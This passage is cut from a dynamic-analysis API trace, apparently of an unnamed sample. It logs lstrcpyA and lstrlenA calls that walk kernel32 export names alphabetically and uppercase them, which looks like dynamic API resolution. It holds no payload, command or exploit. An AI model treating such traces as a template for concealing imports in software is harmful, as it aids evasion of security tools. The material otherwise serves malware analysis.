lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.161] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.161] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.161] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.161] lstrlenA (lpString="COPYFILEW") returned 9 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.161] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.161] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.161] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.161] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.161] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.162] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.162] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.162] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.162] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.162] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.162] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.162] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.162] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.162] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.162] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.162] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.162] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.162] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.162] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.162] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.162] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.162] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.162] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.162] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.162] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.163] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.163] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.163] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.163] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.163] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.163] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.163] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.163] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.163] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.163] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.163] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.163] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.163] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.163] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.163] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.163] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.163] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.163] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.163] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.163] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.164] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.164] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.164] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.164] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.164] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.164] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.164] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.164] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.164] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.164] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.164] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.164] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.164] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.164] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.164] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.164] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.164] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.164] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.164] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.165] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.165] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.165] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.165] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.165] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.165] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.165] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.165] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.165] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.165] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.165] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.165] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.165] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.165] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.165] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.165] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.165] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.165] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.165] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.166] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.166] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.166] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.166] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.166] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.166] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.166] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.166] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.166] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.166] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.166] lstrlenA (lpString="DELETEATOM") returned 10 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.166] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.166] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.166] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.166] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.166] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.166] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.166] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.166] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.166] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.167] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.167] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.167] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.167] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.167] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.167] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.167] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.167] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.167] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.167] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.167] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.167] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.167] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.167] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.167] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.167] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.167] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.167] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.167] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.168] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.168] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.168] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.168] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.168] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.168] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.168] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.168] lstrlenA 